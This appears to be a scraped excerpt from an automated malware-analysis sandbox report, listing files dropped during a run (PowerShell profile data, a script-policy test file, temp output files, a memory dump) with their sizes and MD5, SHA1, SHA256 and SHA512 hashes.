38896a604992567244ceb15c546d057d7b0dfd87dd6dd13ca2146a90545a6f2d26a1302c02d964f72a7f16173d356c5e523932c5f1adf27cd2346d96eb904777

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
57cb9a642904803e62dcbb684b8cee69

SHA1
d4d25cdcae6a03c33b2eb5ed8d7c2ed9fed17899

SHA256
aa90b7f64162439c814b92a345bddf79f984b91741dc76f2b7bb15d49fca47ee

SHA512
398b4d2898f79cf3f9eabc67aeb2125e6b5e83ef4fbccf6450681d59ee7763eef7e94499376183d40e9847e2b92c57a9c6480d20d95f7ac05b5570e68c2b8379

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
20d70061533ef23c2b8f438ff1d1fb0c

SHA1
42d35e299ae7d6a07ad335a8b19de9777db6a157

SHA256
31b9ce0ac87d9aad000751ece9fd2afcdf84237ac906753f9c28f94b96facbad

SHA512
25840be8aa1f3dbab25f0110ba7d3e9289a45bffc06df6f73b7c78d018438346e6cfcd50349246e0482342f392bc7371c0b98f4445aa7ccf2c781a7a31d548a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
88314b95a2974dd24711eedda5675217

SHA1
f10f4cf2d0e88ffb237d746b253a45a04a6e14d7

SHA256
e123f9012214e6fd6c7a598f7eadd332c4f54659a28ae20f37563cc5a663ab1f

SHA512
e1bf2cbdabb09cdbe3fa92de336db8d5723bb50e60f850ec1890d5619a13fd7c10e1e050acc94fc452fa2990c7ebb11f4aea98600832e7b3fa4c239e747e6cea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
cb48328892fd008c12db591e93723643

SHA1
b5eaf23599c7e0ee17d83143fdcfaef22a19db5b

SHA256
21ffd152d04fa485229acc92892a5e5106d8ea395ab28bc220ceda333ffc5e94

SHA512
30a1d8e78d1c50c8bf8241dbc8bb43f20e2ff823e0be26a4c565ed38788ead2d338774c460e6077810d011c3df76432e607cdf2b212f8662b01bf14832d6bbde

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3uw03otz.ohc.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\output.txt
Filesize
389B

MD5
bec3d822bd1a8a7caadf692af84b386e

SHA1
f4c42431c06c6b822ce810cee20dced67311345f

SHA256
7596873eaa7ec02a0a6a20aa57858e96162cbe72e4c0db850bca6d5209f796d0

SHA512
ecd0c6952eaa112a5bff5b2d4877aa3da10ce0cdb3a0ac51d2eec7452a2ce13d40764e31d51436cbb3fc63ba3aae9ce4950b848d14250dc1972b4669d981516a

Download Submit
C:\Users\Admin\AppData\Local\Temp\output.txt
Filesize
3B

MD5
bc949ea893a9384070c31f083ccefd26

SHA1
cbb8391cb65c20e2c05a2f29211e55c49939c3db

SHA256
6bdf66b5bf2a44e658bea2ee86695ab150a06e600bf67cd5cce245ad54962c61

SHA512
e4288e71070485637ec5825f510a7daa7e75ef6c71a1b755f51e1b0f2e58e5066837f58408ea74d75db42c49372c6027d433a869904fc5efaf4876dfcfde1287

Download Submit
memory/1124-1-0x000002C1E8980000-0x000002C1E89A2000-memory.dmp

Filesize
136KB

Download